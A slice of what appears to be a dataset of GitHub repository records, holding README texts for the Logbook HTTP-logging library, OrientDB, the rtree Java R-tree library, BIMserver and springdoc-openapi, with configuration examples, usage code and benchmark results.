`logbook.predicate.exclude` | Exclude certain paths and methods (overrides `logbook.preidcates.include`) | `[]` | -| `logbook.secure-filter.enabled` | Enable the [`SecureLogbookFilter`](#servlet) | `true` | -| `logbook.strategy` | [Strategy](#strategy) (`default`, `status-at-least`, `body-only-if-status-at-least`, `without-body`) | `default` | -| `logbook.write.chunk-size` | Splits log lines into smaller chunks of size up-to `chunk-size`. | `0` (disabled) | -| `logbook.write.max-body-size` | Truncates the body up to `max-body-size` and appends `...`.
:warning: Logbook will still buffer the full body, if the request is eligible for logging, regardless of the `logbook.write.max-body-size` value | `-1` (disabled) | - -##### Example configuration - -```yaml -logbook: - predicate: - include: - - path: /api/** - methods: - - GET - - POST - - path: /actuator/** - exclude: - - path: /actuator/health - - path: /api/admin/** - methods: - - POST - filter.enabled: true - secure-filter.enabled: true - format.style: http - strategy: body-only-if-status-at-least - minimum-status: 400 - obfuscate: - headers: - - Authorization - - X-Secret - parameters: - - access_token - - password - write: - chunk-size: 1000 - attribute-extractors: - - type: JwtFirstMatchingClaimExtractor - claim-names: [ ""sub"", ""subject"" ] - claim-key: Principal - - type: JwtAllMatchingClaimsExtractor - claim-names: [ ""sub"", ""iat"" ] -``` - -### logstash-logback-encoder - -For basic Logback configuraton - -``` - - - -``` - -configure Logbook with a `LogstashLogbackSink` - -``` -HttpLogFormatter formatter = new JsonHttpLogFormatter(); -LogstashLogbackSink sink = new LogstashLogbackSink(formatter); -``` - -for outputs like - -``` -{ - ""@timestamp"" : ""2019-03-08T09:37:46.239+01:00"", - ""@version"" : ""1"", - ""message"" : ""GET http://localhost/test?limit=1"", - ""logger_name"" : ""org.zalando.logbook.Logbook"", - ""thread_name"" : ""main"", - ""level"" : ""TRACE"", - ""level_value"" : 5000, - ""http"" : { - // logbook request/response contents - } -} -``` - -#### Customizing default Logging Level - -You have the flexibility to customize the default logging level by initializing `LogstashLogbackSink` with a specific level. For instance: - -``` -LogstashLogbackSink sink = new LogstashLogbackSink(formatter, Level.INFO); -``` - -## Known Issues - -1. The Logbook Servlet Filter interferes with downstream code using `getWriter` and/or `getParameter*()`. See [Servlet](#servlet) for more details. -2. The Logbook Servlet Filter does **NOT** support `ERROR` dispatch. You're strongly encouraged to not use it to produce error responses. - -## Getting Help with Logbook - -If you have questions, concerns, bug reports, etc., please file an issue in this repository's [Issue Tracker](https://github.com/zalando/logbook/issues). - -## Getting Involved/Contributing - -To contribute, simply make a pull request and add a brief description (1-2 sentences) of your addition or change. For -more details, check the [contribution guidelines](.github/CONTRIBUTING.md). - -## Alternatives - -- [Apache HttpClient Wire Logging](http://hc.apache.org/httpcomponents-client-4.5.x/logging.html) - - Client-side only - - Apache HttpClient exclusive - - Support for HTTP bodies -- [Spring Boot Access Logging](http://docs.spring.io/spring-boot/docs/current/reference/htmlsingle/#howto-configure-accesslogs) - - Spring application only - - Server-side only - - Tomcat/Undertow/Jetty exclusive - - **No** support for HTTP bodies -- [Tomcat Request Dumper Filter](https://tomcat.apache.org/tomcat-7.0-doc/config/filter.html#Request_Dumper_Filter) - - Server-side only - - Tomcat exclusive - - **No** support for HTTP bodies -- [logback-access](http://logback.qos.ch/access.html) - - Server-side only - - Any servlet container - - Support for HTTP bodies - -## Credits and References - -![Creative Commons (Attribution-Share Alike 3.0 Unported](https://licensebuttons.net/l/by-sa/3.0/80x15.png) -[*Grand Turk, a replica of a three-masted 6th rate frigate from Nelson's days - logbook and charts*](https://commons.wikimedia.org/wiki/File:Grand_Turk(34).jpg) -by [JoJan](https://commons.wikimedia.org/wiki/User:JoJan) is licensed under a -[Creative Commons (Attribution-Share Alike 3.0 Unported)](http://creativecommons.org/licenses/by-sa/3.0/). -",0 -orientechnologies/orientdb,"OrientDB is the most versatile DBMS supporting Graph, Document, Reactive, Full-Text and Geospatial models in one Multi-Model product. OrientDB can run distributed (Multi-Master), supports SQL, ACID Transactions, Full-Text indexing and Reactive Queries.",2012-12-09T20:33:47Z,,"## OrientDB - -[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) -[![REUSE status](https://api.reuse.software/badge/github.com/orientechnologies/orientdb)](https://api.reuse.software/info/github.com/orientechnologies/orientdb) - ------- - -## What is OrientDB? - -**OrientDB** is an Open Source Multi-Model [NoSQL](http://en.wikipedia.org/wiki/NoSQL) DBMS with the support of Native Graphs, Documents, -Full-Text search, Reactivity, Geo-Spatial and Object Oriented concepts. It's written in Java and it's amazingly fast. -No expensive run-time JOINs, connections are managed as persistent pointers between records. -You can traverse thousands of records in no time. Supports schema-less, schema-full and schema-mixed modes. -Has a strong security profiling system based on user, roles and predicate security and supports [SQL](https://orientdb.org/docs/3.1.x/sql/) amongst the query languages. -Thanks to the [SQL](https://orientdb.org/docs/3.1.x/sql/) layer it's straightforward to use for people skilled in the Relational world. - -[Get started with OrientDB](http://orientdb.org/docs/3.2.x/gettingstarted/) | -[OrientDB Community Group](https://github.com/orientechnologies/orientdb/discussions) | -[Dev Updates](https://fosstodon.org/@orientdb) | -[Community Chat](https://matrix.to/#/#orientdb-community:matrix.org) . - -## Is OrientDB a Relational DBMS? - -No. OrientDB adheres to the [NoSQL](http://en.wikipedia.org/wiki/NoSQL) movement even though it supports [ACID Transactions](https://orientdb.org/docs/3.2.x/internals/Transactions.html) and -[SQL](https://orientdb.org/docs/3.2.x/sql/) as query language. In this way it's easy to start using it without having to learn too much new stuff. - - -## Easy to install and use - -Yes. OrientDB is totally written in [Java](http://en.wikipedia.org/wiki/Java_%28programming_language%29) and can run on any platform without configuration and installation. -Do you develop with a language different than Java? No problem, look at the [Programming Language Binding](http://orientdb.org/docs/3.1.x/apis-and-drivers/). - - -## Main References -- [Documentation Version < 3.2.x](http://orientdb.org/docs/3.1.x/) -- For any questions visit the [OrientDB Community Group](https://github.com/orientechnologies/orientdb/discussions) - -[Get started with OrientDB](http://orientdb.org/docs/3.2.x/gettingstarted/). - --------- -## Contributing - -For the guide to contributing to OrientDB checkout the [CONTRIBUTING.MD](https://github.com/orientechnologies/orientdb/blob/develop/CONTRIBUTING.md) - -All the contribution are considered licensed under Apache-2 license if not stated otherwise. - --------- - -## Licensing -OrientDB is licensed by OrientDB LTD under the Apache 2 license. OrientDB relies on the following 3rd party libraries, which are compatible with the Apache license: - -- Javamail: CDDL license (http://www.oracle.com/technetwork/java/faq-135477.html) -- java persistence 2.0: CDDL license -- JNA: Apache 2 (https://github.com/twall/jna/blob/master/LICENSE) -- Hibernate JPA 2.0 API: Eclipse Distribution License 1.0 -- ASM: OW2 - -References: -- Apache 2 license (Apache2): - http://www.apache.org/licenses/LICENSE-2.0.html - -- Common Development and Distribution License (CDDL-1.0): - http://opensource.org/licenses/CDDL-1.0 - -- Eclipse Distribution License (EDL-1.0): - http://www.eclipse.org/org/documents/edl-v10.php (http://www.eclipse.org/org/documents/edl-v10.php) - -### Sponsors - -[![](http://s1.softpedia-static.com/_img/sp100free.png?1)](http://www.softpedia.com/get/Internet/Servers/Database-Utils/OrientDB.shtml#status) - --------- - - -### Reference - -Recent architecture re-factoring and improvements are described in our [BICOD 2021](http://ceur-ws.org/Vol-3163/BICOD21_paper_3.pdf) paper: - -``` -@inproceedings{DBLP:conf/bncod/0001DLT21, - author = {Daniel Ritter and - Luigi Dell'Aquila and - Andrii Lomakin and - Emanuele Tagliaferri}, - title = {OrientDB: {A} NoSQL, Open Source {MMDMS}}, - booktitle = {Proceedings of the The British International Conference on Databases - 2021, London, United Kingdom, March 28, 2022}, - series = {{CEUR} Workshop Proceedings}, - volume = {3163}, - pages = {10--19}, - publisher = {CEUR-WS.org}, - year = {2021} -} -``` - -",0 -davidmoten/rtree,Immutable in-memory R-tree and R*-tree implementations in Java with reactive api,2014-08-26T12:29:14Z,,"rtree -========= -
-[![Coverity Scan](https://scan.coverity.com/projects/4762/badge.svg?flat=1)](https://scan.coverity.com/projects/4762?tab=overview)
-[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.github.davidmoten/rtree/badge.svg?style=flat)](https://maven-badges.herokuapp.com/maven-central/com.github.davidmoten/rtree)
-[![codecov](https://codecov.io/gh/davidmoten/rtree/branch/master/graph/badge.svg)](https://codecov.io/gh/davidmoten/rtree) - - -In-memory immutable 2D [R-tree](http://en.wikipedia.org/wiki/R-tree) implementation in java using [RxJava Observables](https://github.com/ReactiveX/RxJava) for reactive processing of search results. - -Status: *released to Maven Central* - -Note that the **next version** (without a reactive API and without serialization) is at [rtree2](https://github.com/davidmoten/rtree2). - -An [R-tree](http://en.wikipedia.org/wiki/R-tree) is a commonly used spatial index. - -This was fun to make, has an elegant concise algorithm, is thread-safe, fast, and reasonably memory efficient (uses structural sharing). - -The algorithm to achieve immutability is cute. For insertion/deletion it involves recursion down to the -required leaf node then recursion back up to replace the parent nodes up to the root. The guts of -it is in [Leaf.java](src/main/java/com/github/davidmoten/rtree/internal/LeafDefault.java) and [NonLeaf.java](src/main/java/com/github/davidmoten/rtree/internal/NonLeafDefault.java). - -[Backpressure](https://github.com/ReactiveX/RxJava/wiki/Backpressure) support required some complexity because effectively a -bookmark needed to be kept for a position in the tree and returned to later to continue traversal. An immutable stack containing - the node and child index of the path nodes came to the rescue here and recursion was abandoned in favour of looping to prevent stack overflow (unfortunately java doesn't support tail recursion!). - -Maven site reports are [here](http://davidmoten.github.io/rtree/index.html) including [javadoc](http://davidmoten.github.io/rtree/apidocs/index.html). - -Features ------------- -* immutable R-tree suitable for concurrency -* Guttman's heuristics (Quadratic splitter) ([paper](https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0CB8QFjAA&url=http%3A%2F%2Fpostgis.org%2Fsupport%2Frtree.pdf&ei=ieEQVJuKGdK8uATpgoKQCg&usg=AFQjCNED9w2KjgiAa9UI-UO_0eWjcADTng&sig2=rZ_dzKHBHY62BlkBuw3oCw&bvm=bv.74894050,d.c2E)) -* R*-tree heuristics ([paper](http://dbs.mathematik.uni-marburg.de/publications/myPapers/1990/BKSS90.pdf)) -* Customizable [splitter](src/main/java/com/github/davidmoten/rtree/Splitter.java) and [selector](src/main/java/com/github/davidmoten/rtree/Selector.java) -* 10x faster index creation with STR bulk loading ([paper](https://www.researchgate.net/profile/Scott_Leutenegger/publication/3686660_STR_A_Simple_and_Efficient_Algorithm_for_R-Tree_Packing/links/5563368008ae86c06b676a02.pdf)). -* search returns [```Observable```](http://reactivex.io/RxJava/javadoc/rx/Observable.html) -* search is cancelled by unsubscription -* search is ```O(log(n))``` on average -* insert, delete are ```O(n)``` worst case -* all search methods return lazy-evaluated streams offering efficiency and flexibility of functional style including functional composition and concurrency -* balanced delete -* uses structural sharing -* supports [backpressure](https://github.com/ReactiveX/RxJava/wiki/Backpressure) -* JMH benchmarks -* visualizer included -* serialization using [FlatBuffers](http://github.com/google/flatbuffers) -* high unit test [code coverage](http://davidmoten.github.io/rtree/cobertura/index.html) -* R*-tree performs 900,000 searches/second returning 22 entries from a tree of 38,377 Greek earthquake locations on i7-920@2.67Ghz (maxChildren=4, minChildren=1). Insert at 240,000 entries per second. -* requires java 1.6 or later - -Number of points = 1000, max children per node 8: - -| Quadratic split | R*-tree split | STR bulk loaded | -| :-------------: | :-----------: | :-----------: | -| | | | - - -Notice that there is little overlap in the R*-tree split compared to the -Quadratic split. This should provide better search performance (and in general benchmarks show this). - -STR bulk loaded R-tree has a bit more overlap than R*-tree, which affects the search performance at some extent. - -Getting started ----------------- -Add this maven dependency to your pom.xml: - -```xml - - com.github.davidmoten - rtree - VERSION_HERE - -``` -### Instantiate an R-Tree -Use the static builder methods on the ```RTree``` class: - -```java -// create an R-tree using Quadratic split with max -// children per node 4, min children 2 (the threshold -// at which members are redistributed) -RTree tree = RTree.create(); -``` -You can specify a few parameters to the builder, including *minChildren*, *maxChildren*, *splitter*, *selector*: - -```java -RTree tree = RTree.minChildren(3).maxChildren(6).create(); -``` -### Geometries -The following geometries are supported for insertion in an RTree: - -* `Rectangle` -* `Point` -* `Circle` -* `Line` - -### Generic typing -If for instance you know that the entry geometry is always ```Point``` then create an ```RTree``` specifying that generic type to gain more type safety: - -```java -RTree tree = RTree.create(); -``` - -### R*-tree -If you'd like an R*-tree (which uses a topological splitter on minimal margin, overlap area and area and a selector combination of minimal area increase, minimal overlap, and area): - -``` -RTree tree = RTree.star().maxChildren(6).create(); -``` - -See benchmarks below for some of the performance differences. - -### Add items to the R-tree -When you add an item to the R-tree you need to provide a geometry that represents the 2D physical location or -extension of the item. The ``Geometries`` builder provides these factory methods: - -* ```Geometries.rectangle``` -* ```Geometries.circle``` -* ```Geometries.point``` -* ```Geometries.line``` (requires *jts-core* dependency) - -To add an item to an R-tree: - -```java -RTree tree = RTree.create(); -tree = tree.add(item, Geometries.point(10,20)); -``` -or -```java -tree = tree.add(Entries.entry(item, Geometries.point(10,20)); -``` - -*Important note:* being an immutable data structure, calling ```tree.add(item, geometry)``` does nothing to ```tree```, -it returns a new ```RTree``` containing the addition. Make sure you use the result of the ```add```! - -### Remove an item in the R-tree -To remove an item from an R-tree, you need to match the item and its geometry: - -```java -tree = tree.delete(item, Geometries.point(10,20)); -``` -or -```java -tree = tree.delete(entry); -``` - -*Important note:* being an immutable data structure, calling ```tree.delete(item, geometry)``` does nothing to ```tree```, -it returns a new ```RTree``` without the deleted item. Make sure you use the result of the ```delete```! - -### Geospatial geometries (lats and longs) -To handle wraparounds of longitude values on the earth (180/-180 boundary trickiness) there are special factory methods in the `Geometries` class. If you want to do geospatial searches then you should use these methods to build `Point`s and `Rectangle`s: - -```java -Point point = Geometries.pointGeographic(lon, lat); -Rectangle rectangle = Geometries.rectangleGeographic(lon1, lat1, lon2, lat2); -``` - -Under the covers these methods normalize the longitude value to be in the interval [-180, 180) and for rectangles the rightmost longitude has 360 added to it if it is less than the leftmost longitude. - -### Custom geometries -You can also write your own implementation of [```Geometry```](src/main/java/com/github/davidmoten/rtree/geometry/Geometry.java). An implementation of ```Geometry``` needs to specify methods to: - -* check intersection with a rectangle (you can reuse the distance method here if you want but it might affect performance) -* provide a minimum bounding rectangle -* implement ```equals``` and ```hashCode``` for consistent equality checking -* measure distance to a rectangle (0 means they intersect). Note that this method is only used for search within a distance so implementing this method is *optional*. If you don't want to implement this method just throw a ```RuntimeException```. - -For the R-tree to be well-behaved, the distance function if implemented needs to satisfy these properties: - -* ```distance(r) >= 0 for all rectangles r``` -* ```if rectangle r1 contains r2 then distance(r1)<=distance(r2)``` -* ```distance(r) = 0 if and only if the geometry intersects the rectangle r``` - -### Searching -The advantage of an R-tree is the ability to search for items in a region reasonably quickly. -On average search is ```O(log(n))``` but worst case is ```O(n)```. - -Search methods return ```Observable``` sequences: -```java -Observable> results = - tree.search(Geometries.rectangle(0,0,2,2)); -``` -or search for items within a distance from the given geometry: -```java -Observable> results = - tree.search(Geometries.rectangle(0,0,2,2),5.0); -``` -To return all entries from an R-tree: -```java -Observable> results = tree.entries(); -``` - -Search with a custom geometry ------------------------------------ -Suppose you make a custom geometry like ```Polygon``` and you want to search an ```RTree``` for points inside the polygon. This is how you do it: - -```java -RTree tree = RTree.create(); -Func2 pointInPolygon = ... -Polygon polygon = ... -... -entries = tree.search(polygon, pointInPolygon); -``` -The key is that you need to supply the ```intersects``` function (```pointInPolygon```) to the search. It is on you to implement that for all types of geometry present in the ```RTree```. This is one reason that the generic ```Geometry``` type was added in *rtree* 0.5 (so the type system could tell you what geometry types you needed to calculate intersection for) . - -Search with a custom geometry and maxDistance --------------------------------------------------- -As per the example above to do a proximity search you need to specify how to calculate distance between the geometry you are searching and the entry geometries: - -```java -RTree tree = RTree.create(); -Func2 distancePointToPolygon = ... -Polygon polygon = ... -... -entries = tree.search(polygon, 10, distancePointToPolygon); -``` -Example --------------- -```java -import com.github.davidmoten.rtree.RTree; -import static com.github.davidmoten.rtree.geometry.Geometries.*; - -RTree tree = RTree.maxChildren(5).create(); -tree = tree.add(""DAVE"", point(10, 20)) - .add(""FRED"", point(12, 25)) - .add(""MARY"", point(97, 125)); - -Observable> entries = - tree.search(Geometries.rectangle(8, 15, 30, 35)); -``` - -Searching by distance on lat longs ------------------------------------- -See [LatLongExampleTest.java](src/test/java/com/github/davidmoten/rtree/LatLongExampleTest.java) for an example. The example depends on [*grumpy-core*](https://github.com/davidmoten/grumpy) artifact which is also on Maven Central. - -Another lat long example searching geo circles ------------------------------------------------- -See [LatLongExampleTest.testSearchLatLongCircles()](src/test/java/com/github/davidmoten/rtree/LatLongExampleTest.java) for an example of searching circles around geographic points (using great circle distance). - - -What do I do with the Observable thing? -------------------------------------------- -Very useful, see [RxJava](http://github.com/ReactiveX/RxJava). - -As an example, suppose you want to filter the search results then apply a function on each and reduce to some best answer: - -```java -import rx.Observable; -import rx.functions.*; -import rx.schedulers.Schedulers; - -Character result = - tree.search(Geometries.rectangle(8, 15, 30, 35)) - // filter for names alphabetically less than M - .filter(entry -> entry.value() < ""M"") - // get the first character of the name - .map(entry -> entry.value().charAt(0)) - // reduce to the first character alphabetically - .reduce((x,y) -> x <= y ? x : y) - // subscribe to the stream and block for the result - .toBlocking().single(); -System.out.println(list); -``` -output: -``` -D -``` - -How to configure the R-tree for best performance --------------------------------------------------- -Check out the benchmarks below and refer to [another benchmark results](https://github.com/ambling/rtree-benchmark#results), but I recommend you do your own benchmarks because every data set will behave differently. If you don't want to benchmark then use the defaults. General rules based on the benchmarks: - -* for data sets of <10,000 entries use the default R-tree (quadratic splitter with maxChildren=4) -* for data sets of >=10,000 entries use the star R-tree (R*-tree heuristics with maxChildren=4 by default) -* use STR bulk loaded R-tree (quadratic splitter or R*-tree heuristics) for large (where index creation time is important) or static (where insertion and deletion are not frequent) data sets - -Watch out though, the benchmark data sets had quite specific characteristics. The 1000 entry dataset was randomly generated (so is more or less uniformly distributed) and the *Greek* dataset was earthquake data with its own clustering characteristics. - -What about memory use? ------------------------- -To minimize memory use you can use geometries that store single precision decimal values (`float`) instead of double precision (`double`). Here are examples: - -```java -// create geometry using double precision -Rectangle r = Geometries.rectangle(1.0, 2.0, 3.0, 4.0); - -// create geometry using single precision -Rectangle r = Geometries.rectangle(1.0f, 2.0f, 3.0f, 4.0f); -``` - -The same creation methods exist for `Circle` and `Line`. - -How do I just get an Iterable back from a search? ---------------------------------------------------------- -If you are not familiar with the Observable API and want to skip the reactive stuff then here's how to get an ```Iterable``` from a search: - -```java -Iterable it = tree.search(Geometries.point(4,5)) - .toBlocking().toIterable(); -``` - -Backpressure ------------------ -The backpressure slow path may be enabled by some RxJava operators. This may slow search performance by a factor of 3 but avoids possible out of memory errors and thread starvation due to asynchronous buffering. Backpressure is benchmarked below. - -Visualizer --------------- -To visualize the R-tree in a PNG file of size 600 by 600 pixels just call: -```java -tree.visualize(600,600) - .save(""target/mytree.png""); -``` -The result is like the images in the Features section above. - -Visualize as text --------------------- -The ```RTree.asString()``` method returns output like this: - -``` -mbr=Rectangle [x1=10.0, y1=4.0, x2=62.0, y2=85.0] - mbr=Rectangle [x1=28.0, y1=4.0, x2=34.0, y2=85.0] - entry=Entry [value=2, geometry=Point [x=29.0, y=4.0]] - entry=Entry [value=1, geometry=Point [x=28.0, y=19.0]] - entry=Entry [value=4, geometry=Point [x=34.0, y=85.0]] - mbr=Rectangle [x1=10.0, y1=45.0, x2=62.0, y2=63.0] - entry=Entry [value=5, geometry=Point [x=62.0, y=45.0]] - entry=Entry [value=3, geometry=Point [x=10.0, y=63.0]] -``` - -Serialization ------------------- -Release 0.8 includes [flatbuffers](https://github.com/google/flatbuffers) support as a serialization format and as a lower performance but lower memory consumption (approximately one third) option for an RTree. - -The greek earthquake data (38,377 entries) when placed in a default RTree with `maxChildren=10` takes up 4,548,133 bytes in memory. If that data is serialized then reloaded into memory using the `InternalStructure.FLATBUFFERS_SINGLE_ARRAY` option then the RTree takes up 1,431,772 bytes in memory (approximately one third the memory usage). Bear in mind though that searches are much more expensive (at the moment) with this data structure because of object creation and gc pressures (see benchmarks). Further work would be to enable direct searching of the underlying array without object creation expenses required to match the current search routines. - -As of 5 March 2016, indicative RTree metrics using flatbuffers data structure are: - -* one third the memory use with log(N) object creations per search -* one third the speed with backpressure (e.g. if `flatMap` or `observeOn` is downstream) -* one tenth the speed without backpressure - -Note that serialization uses an optional dependency on `flatbuffers`. Add the following to your pom dependencies: - -```xml - - com.google.flatbuffers - flatbuffers-java - 2.0.3 - true - -``` - -## Serialization example - -Write an `RTree` to an `OutputStream`: -```java -RTree tree = ...; -OutputStream os = ...; -Serializer serializer = - Serializers.flatBuffers().utf8(); -serializer.write(tree, os); -``` - -Read an `RTree` from an `InputStream` into a low-memory flatbuffers based structure: -```java -RTree tree = - serializer.read(is, lengthBytes, InternalStructure.SINGLE_ARRAY); -``` - -Read an `RTree` from an `InputStream` into a default structure: -```java -RTree tree = - serializer.read(is, lengthBytes, InternalStructure.DEFAULT); -``` - -Dependencies ---------------------- -As of 0.7.5 this library does not depend on *guava* (>2M) but rather depends on *guava-mini* (11K). The `nearest` search used to depend on `MinMaxPriorityQueue` from guava but now uses a backport of Java 8 `PriorityQueue` inside a custom `BoundedPriorityQueue` class that gives about 1.7x the throughput as the guava class. - -How to build ----------------- -``` -git clone https://github.com/davidmoten/rtree.git -cd rtree -mvn clean install -``` - -How to run benchmarks --------------------------- -Benchmarks are provided by -``` -mvn clean install -Pbenchmark -``` -Coverity scan ----------------- -This codebase is scanned by Coverity scan whenever the branch `coverity_scan` is updated. - -For the project committers if a coverity scan is desired just do this: - -```bash -git checkout coverity_scan -git pull origin master -git push origin coverity_scan -``` - -### Notes -The *Greek* data referred to in the benchmarks is a collection of some 38,377 entries corresponding to the epicentres of earthquakes in Greece between 1964 and 2000. This data set is used by multiple studies on R-trees as a test case. - -### Results - -These were run on i7-920 @2.67GHz with *rtree* version 0.8-RC7: - -``` -Benchmark Mode Cnt Score Error Units - -defaultRTreeInsertOneEntryInto1000EntriesMaxChildren004 thrpt 10 262260.993 ± 2767.035 ops/s -defaultRTreeInsertOneEntryInto1000EntriesMaxChildren010 thrpt 10 296264.913 ± 2836.358 ops/s -defaultRTreeInsertOneEntryInto1000EntriesMaxChildren032 thrpt 10 135118.271 ± 1722.039 ops/s -defaultRTreeInsertOneEntryInto1000EntriesMaxChildren128 thrpt 10 315851.452 ± 3097.496 ops/s -defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren004 thrpt 10 278761.674 ± 4182.761 ops/s -defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren010 thrpt 10 315254.478 ± 4104.206 ops/s -defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren032 thrpt 10 214509.476 ± 1555.816 ops/s -defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren128 thrpt 10 118094.486 ± 1118.983 ops/s -defaultRTreeSearchOf1000PointsMaxChildren004 thrpt 10 1122140.598 ± 8509.106 ops/s -defaultRTreeSearchOf1000PointsMaxChildren010 thrpt 10 569779.807 ± 4206.544 ops/s -defaultRTreeSearchOf1000PointsMaxChildren032 thrpt 10 238251.898 ± 3916.281 ops/s -defaultRTreeSearchOf1000PointsMaxChildren128 thrpt 10 702437.901 ± 5108.786 ops/s -defaultRTreeSearchOfGreekDataPointsMaxChildren004 thrpt 10 462243.509 ± 7076.045 ops/s -defaultRTreeSearchOfGreekDataPointsMaxChildren010 thrpt 10 326395.724 ± 1699.043 ops/s -defaultRTreeSearchOfGreekDataPointsMaxChildren032 thrpt 10 156978.822 ± 1993.372 ops/s -defaultRTreeSearchOfGreekDataPointsMaxChildren128 thrpt 10 68267.160 ± 929.236 ops/s -rStarTreeDeleteOneEveryOccurrenceFromGreekDataChildren010 thrpt 10 211881.061 ± 3246.693 ops/s -rStarTreeInsertOneEntryInto1000EntriesMaxChildren004 thrpt 10 187062.089 ± 3005.413 ops/s -rStarTreeInsertOneEntryInto1000EntriesMaxChildren010 thrpt 10 186767.045 ± 2291.196 ops/s -rStarTreeInsertOneEntryInto1000EntriesMaxChildren032 thrpt 10 37940.625 ± 743.789 ops/s -rStarTreeInsertOneEntryInto1000EntriesMaxChildren128 thrpt 10 151897.089 ± 674.941 ops/s -rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren004 thrpt 10 237708.825 ± 1644.611 ops/s -rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren010 thrpt 10 229577.905 ± 4234.760 ops/s -rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren032 thrpt 10 78290.971 ± 393.030 ops/s -rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren128 thrpt 10 6521.010 ± 50.798 ops/s -rStarTreeSearchOf1000PointsMaxChildren004 thrpt 10 1330510.951 ± 18289.410 ops/s -rStarTreeSearchOf1000PointsMaxChildren010 thrpt 10 1204347.202 ± 17403.105 ops/s -rStarTreeSearchOf1000PointsMaxChildren032 thrpt 10 576765.468 ± 8909.880 ops/s -rStarTreeSearchOf1000PointsMaxChildren128 thrpt 10 1028316.856 ± 13747.282 ops/s -rStarTreeSearchOfGreekDataPointsMaxChildren004 thrpt 10 904494.751 ± 15640.005 ops/s -rStarTreeSearchOfGreekDataPointsMaxChildren010 thrpt 10 649636.969 ± 16383.786 ops/s -rStarTreeSearchOfGreekDataPointsMaxChildren010FlatBuffers thrpt 10 84230.053 ± 1869.345 ops/s -rStarTreeSearchOfGreekDataPointsMaxChildren010FlatBuffersBackpressure thrpt 10 36420.500 ± 1572.298 ops/s -rStarTreeSearchOfGreekDataPointsMaxChildren010WithBackpressure thrpt 10 116970.445 ± 1955.659 ops/s -rStarTreeSearchOfGreekDataPointsMaxChildren032 thrpt 10 224874.016 ± 14462.325 ops/s -rStarTreeSearchOfGreekDataPointsMaxChildren128 thrpt 10 358636.637 ± 4886.459 ops/s -searchNearestGreek thrpt 10 3715.020 ± 46.570 ops/s - -``` - -There is a related project [rtree-benchmark](https://github.com/ambling/rtree-benchmark) that presents a more comprehensive benchmark with results and analysis on this rtree implementation. -",0 -opensourceBIM/BIMserver,The open source BIMserver platform,2013-05-08T14:55:01Z,,"BIMserver -========= - -The Building Information Model server (short: BIMserver) enables you to store and manage the information of a construction (or other building related) project. Data is stored in the open data standard IFC. The BIMserver is not a fileserver, but it uses a model-driven architecture approach. This means that IFC data is stored as objects. You could see BIMserver as an IFC database, with special extra features like model checking, versioning, project structures, merging, etc. The main advantage of this approach is the ability to query, merge and filter the BIM-model and generate IFC output (i.e. files) on the fly. - -Thanks to its multi-user support, multiple people can work on their own part of the dataset, while the complete dataset is updated on the fly. Other users can get notifications when the model (or a part of it) is updated. - -BIMserver is built for developers. We've got a great wiki on https://github.com/opensourceBIM/BIMserver/wiki and are very active supporting developers on https://github.com/opensourceBIM/BIMserver/issues - -(C) Copyright by the contributers / BIMserver.org - -Licence: GNU Affero General Public License, version 3 (see http://www.gnu.org/licenses/agpl-3.0.html) -Beware: this project makes intensive use of several other projects with different licenses. Some plugins and libraries are published under a different license. -",0 -springdoc/springdoc-openapi,Library for OpenAPI 3 with spring-boot,2019-07-11T23:08:20Z,,"![Octocat](https://springdoc.org/img/banner-logo.svg) -[![Build Status](https://ci-cd.springdoc.org:8443/buildStatus/icon?job=springdoc-openapi-starter-IC)](https://ci-cd.springdoc.org:8443/view/springdoc-openapi/job/springdoc-openapi-starter-IC/) -[![Quality Gate](https://sonarcloud.io/api/project_badges/measure?project=springdoc_springdoc-openapi&metric=alert_status)](https://sonarcloud.io/dashboard?id=springdoc_springdoc-openapi) -[![Known Vulnerabilities](https://snyk.io/test/github/springdoc/springdoc-openapi.git/badge.svg)](https://snyk.io/test/github/springdoc/springdoc-openapi.git) -[![Stack Exchange questions](https://img.shields.io/stackexchange/stackoverflow/t/springdoc)](https://stackoverflow.com/questions/tagged/springdoc?tab=Votes) - -IMPORTANT: ``springdoc-openapi v1.8.0`` is the latest Open Source release supporting Spring Boot 2.x and 1.x. - -An extended support for [*springdoc-openapi v1*](https://springdoc.org/v1) -project is now available for organizations that need support beyond 2023. - -For more details, feel free to reach out: [sales@springdoc.org](mailto:sales@springdoc.org) - -``springdoc-openapi`` is on [Open Collective](https://opencollective.com/springdoc). If you ❤️ this project consider becoming -a [sponsor](https://github.com/sponsors/springdoc). - -This project is sponsored by - -

- - - -   - - - - - - - - -

- -# Table of Contents - -- [Full documentation](#full-documentation) -- [**Introduction**](#introduction) -- [**Getting Started**](#getting-started) - - [Library for springdoc-openapi integration with spring-boot and swagger-ui](#library-for-springdoc-openapi-integration-with-spring-boot-and-swagger-ui) - - [Spring-boot with OpenAPI Demo applications.](#spring-boot-with-openapi-demo-applications) - - [Source Code for Demo Applications.](#source-code-for-demo-applications) - - [Demo Spring Boot 2 Web MVC with OpenAPI 3.](#demo-spring-boot-2-web-mvc-with-openapi-3) - - [Demo Spring Boot 2 WebFlux with OpenAPI 3.](#demo-spring-boot-2-webflux-with-openapi-3) - - [Demo Spring Boot 2 WebFlux with Functional endpoints OpenAPI 3.](#demo-spring-boot-2-webflux-with-functional-endpoints-openapi-3) - - [Demo Spring Boot 2 and Spring Hateoas with OpenAPI 3.](#demo-spring-boot-2-and-spring-hateoas-with-openapi-3) - - [Integration of the library in a Spring Boot 3.x project without the swagger-ui:](#integration-of-the-library-in-a-spring-boot-3x-project-without-the-swagger-ui) - - [Error Handling for REST using @ControllerAdvice](#error-handling-for-rest-using-controlleradvice) - - [Adding API Information and Security documentation](#adding-api-information-and-security-documentation) - - [spring-webflux support with Annotated Controllers](#spring-webflux-support-with-annotated-controllers) -- [Acknowledgements](#acknowledgements) - - [Contributors](#contributors) - - [Additional Support](#additional-support) - -# [Full documentation](https://springdoc.org/) - -# **Introduction** - -The springdoc-openapi Java library helps automating the generation of API documentation -using Spring Boot projects. 